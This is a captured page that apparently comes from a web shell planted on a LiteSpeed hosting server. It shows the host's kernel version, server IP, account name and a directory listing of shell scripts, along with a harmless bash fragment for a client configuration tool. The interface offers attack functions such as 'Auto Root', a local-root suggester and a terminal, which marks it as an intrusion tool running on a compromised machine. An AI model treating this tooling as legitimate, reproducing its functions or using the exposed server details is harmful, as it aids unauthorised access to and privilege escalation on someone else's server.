Linux ih01.iridiumhosting.com 5.14.0-611.5.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 08:09:09 EST 2025 x86_64
LiteSpeed
Server IP : 67.227.241.211 & Your IP : 216.73.216.226
Domains :
Cant Read [ /etc/named.conf ]
User : dustinhy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
MXB /
sbin /
Delete
Unzip
Name
Size
Permission
Date
Action
common_utils-fp.sh
6.97
KB
-rwxr-xr-x
2026-04-15 09:20
configure-fp.sh
23.59
KB
-rwxr-xr-x
2026-04-15 09:20
ct_utils-fp.sh
838
B
-rwxr-xr-x
2026-04-15 09:20
proxy_settings_utils-fp.sh
2.34
KB
-rwxr-xr-x
2026-04-15 09:20
ui_utils-fp.sh
669
B
-rwxr-xr-x
2026-04-15 09:20
uif_v1-fp.sh
16.8
KB
-rwxr-xr-x
2026-04-15 09:20
uninstall-fp.sh
3.59
KB
-rwxr-xr-x
2026-04-15 09:20
update_v1-fp.sh
1.43
KB
-rwxr-xr-x
2026-04-15 09:20
Save
Rename
# Arguments: # $1: Config ini path client_tool_install_wizard_disable() { local configFilePath="$1" local output output="$("${CLIENT_TOOL}" -machine-readable install.wizard.disable -config-path="${configFilePath}" 2>/dev/null)" local errorCode=$? if [ ${errorCode} -ne 0 ]; then client_tool_alert_user "Failed to disable install wizard." return 1 fi echo "${output}" } # Arguments: # $1: Config ini path client_tool_is_device_configured() { local configFilePath="$1" local output output="$("${CLIENT_TOOL}" -machine-readable install.device.is-configured -config-path="${configFilePath}" 2>/dev/null)" local errorCode=$? if [ ${errorCode} -ne 0 ]; then client_tool_alert_user "There is no configured device found." return 1 fi echo "${output}" }